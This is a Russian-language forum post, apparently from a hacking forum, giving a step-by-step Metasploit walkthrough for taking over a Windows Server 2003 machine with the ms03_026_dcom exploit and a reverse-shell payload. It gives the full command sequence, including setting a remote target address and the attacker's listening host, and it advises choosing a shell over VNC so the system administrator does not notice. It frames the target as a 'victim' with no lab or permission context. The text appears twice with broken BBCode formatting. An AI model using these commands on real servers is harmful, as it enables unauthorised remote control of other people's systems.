cat_meow_666
Green Team
Всем привет
Сижу значить смотрю свой любимый форум))(CODEBY)
И как вдруг написал мне Друг. И спрашивает как залить эксплоит на сервер. Было это 1-2 месяца назад. В тот момент я понятие не имел как это вообще работает. И решил помочь ему. И пошёл копать информацию.
И через неделю несколько я получил что хотел)))
Вот результаты.
Сейчас мы попытаемся установить командную строку на сервере 2003, которая позволит нам удаленно выполнять команду в системе.
Хорошо, загрузите свою Linux-машину(или же Windowsз or Mac) и запустите консоль Metasploit, и давайте начнем!
Экран запуска должен выглядеть следующим образом:
1) Найдите Exploit )
Теперь давайте искать подходящий эксплойт, чтобы взломать эту систему 2003 года. Наберите:
Это должно дать нам список эксплойтов, которые мы можем использовать для систем Windows.
2)Выберите свой любимый
Давайте выберем проверенный и действительный эксплойт, который почти всегда успешно работает с Windows Server 2003, использует / windows / dcerpc / ms03_026_dcom. Тип:
Чтобы получить дополнительную информацию об этом эксплойте, наберите:
3) Проверьте свои параметры
Чтобы начать использовать этот Windows Server 2003, сначала нужно проверить наши параметры. Тип:
Обратите внимание, что нам нужно установить RHOST или удаленный хост системы, которую мы используем. В моем случае это 78.XX.XXX.XXX (ваш, скорее всего, будет отличаться). Поэтому мы установили наш RHOST на 78.XX.XXX.XXX
4)Показать полезную нагрузку
Затем нам нужно установить полезную нагрузку для использования системы Windows Server 2003. В нашем случае мы рассмотрим возможность установки командной оболочки на серверной системе, чтобы мы могли управлять ею удаленно и дискретно. Мы могли бы отправить что-то вроде полезной информации VNC, где мы могли бы получить графический интерфейс системы, но это, скорее всего, будет замечено администратором системы, поскольку он видит, что его мышь перемещается по экрану. Мы будем использовать полезную нагрузку VNC в будущем взломе.
Итак, чтобы узнать, какие полезные ресурсы нам доступны, нам просто нужно ввести show payloads, а Metasploit перечислит все полезные ресурсы для этого эксплойта.
[/B][/B]
5) Подключение
См. Полезную нагрузку в верхней части с именем windows / shell_reverse_tcp? Это тот, который мы хотим использовать. Он подключится к окну Windows Server 2003 и вернет нам командную оболочку для удаленного управления системой жертвы. Тип:
6) Задайте параметры полезной нагрузки
Теперь, когда мы установили эксплойт и полезную нагрузку, осталось только указать параметры полезной нагрузки. Тип:
Как видно из приведенного выше скриншота, эта полезная нагрузка требует, чтобы мы установили LHOST или локальный хост. Другими словами, нам нужно сообщить полезную нагрузку, в какой системе мы хотим, чтобы командная оболочка подключалась обратно. Это были бы мы! Итак, дайте ему свой IP-адрес. Мой - 192.168.1.XXX, поэтому я набрал:Как видно из приведенного выше скриншота, эта полезная нагрузка требует, чтобы мы установили LHOST или локальный хост. Другими словами, нам нужно сообщить полезную нагрузку, в какой системе мы хотим, чтобы командная оболочка подключалась обратно. Это были бы мы! Итак, дайте ему свой IP-адрес. Мой - 192.168.1.XXX, поэтому я набрал:
Metasploit отправит полезную нагрузку в систему Windows Server 2003 и вернет вам командную строку. Теперь у вас есть (pwn) эта система! Если вы не получите приглашение командной строки в первый раз, повторите попытку, так как ни один из этих эксплойтов не работает на 100% каждый раз.
Так же работает и (Windows NT, 2000, XP и 2003)
)(Писал в спешке особенно последний Часть)
Сижу значить смотрю свой любимый форум))(CODEBY)
И как вдруг написал мне Друг. И спрашивает как залить эксплоит на сервер. Было это 1-2 месяца назад. В тот момент я понятие не имел как это вообще работает. И решил помочь ему. И пошёл копать информацию.
И через неделю несколько я получил что хотел)))
Вот результаты.
Сейчас мы попытаемся установить командную строку на сервере 2003, которая позволит нам удаленно выполнять команду в системе.
Хорошо, загрузите свою Linux-машину(или же Windowsз or Mac) и запустите консоль Metasploit, и давайте начнем!
Экран запуска должен выглядеть следующим образом:
1) Найдите Exploit )
Теперь давайте искать подходящий эксплойт, чтобы взломать эту систему 2003 года. Наберите:
Код:
[B]msf> search platform:windows type:exploit[/B]
Это должно дать нам список эксплойтов, которые мы можем использовать для систем Windows.
2)Выберите свой любимый
Давайте выберем проверенный и действительный эксплойт, который почти всегда успешно работает с Windows Server 2003, использует / windows / dcerpc / ms03_026_dcom. Тип:
Код:
msf> use exploit / windows / dcerpc / ms03_026_dcom
Чтобы получить дополнительную информацию об этом эксплойте, наберите:
Код:
msf exploit (ms03_26_dcom) info
3) Проверьте свои параметры
Чтобы начать использовать этот Windows Server 2003, сначала нужно проверить наши параметры. Тип:
Код:
[/B]msf> show options[B]
Обратите внимание, что нам нужно установить RHOST или удаленный хост системы, которую мы используем. В моем случае это 78.XX.XXX.XXX (ваш, скорее всего, будет отличаться). Поэтому мы установили наш RHOST на 78.XX.XXX.XXX
Код:
[/B][/B]msf> set RHOST [B][B]78.XX.XXX.XXX[B][B]
4)Показать полезную нагрузку
Затем нам нужно установить полезную нагрузку для использования системы Windows Server 2003. В нашем случае мы рассмотрим возможность установки командной оболочки на серверной системе, чтобы мы могли управлять ею удаленно и дискретно. Мы могли бы отправить что-то вроде полезной информации VNC, где мы могли бы получить графический интерфейс системы, но это, скорее всего, будет замечено администратором системы, поскольку он видит, что его мышь перемещается по экрану. Мы будем использовать полезную нагрузку VNC в будущем взломе.
Итак, чтобы узнать, какие полезные ресурсы нам доступны, нам просто нужно ввести show payloads, а Metasploit перечислит все полезные ресурсы для этого эксплойта.
Код:
[/B][/B]msf > show payloads[B][B]
5) Подключение
См. Полезную нагрузку в верхней части с именем windows / shell_reverse_tcp? Это тот, который мы хотим использовать. Он подключится к окну Windows Server 2003 и вернет нам командную оболочку для удаленного управления системой жертвы. Тип:
Код:
set PAYLOAD windows/shell_reverse_tcp
6) Задайте параметры полезной нагрузки
Теперь, когда мы установили эксплойт и полезную нагрузку, осталось только указать параметры полезной нагрузки. Тип:
Код:
[B]msf> [/B]show options
Как видно из приведенного выше скриншота, эта полезная нагрузка требует, чтобы мы установили LHOST или локальный хост. Другими словами, нам нужно сообщить полезную нагрузку, в какой системе мы хотим, чтобы командная оболочка подключалась обратно. Это были бы мы! Итак, дайте ему свой IP-адрес. Мой - 192.168.1.XXX, поэтому я набрал:Как видно из приведенного выше скриншота, эта полезная нагрузка требует, чтобы мы установили LHOST или локальный хост. Другими словами, нам нужно сообщить полезную нагрузку, в какой системе мы хотим, чтобы командная оболочка подключалась обратно. Это были бы мы! Итак, дайте ему свой IP-адрес. Мой - 192.168.1.XXX, поэтому я набрал:
Код:
[B]msf> [/B] set LHOST 192.168.1.XXX
Код:
msf> exploit
Так же работает и (Windows NT, 2000, XP и 2003)
)(Писал в спешке особенно последний Часть)
Вложения
Последнее редактирование: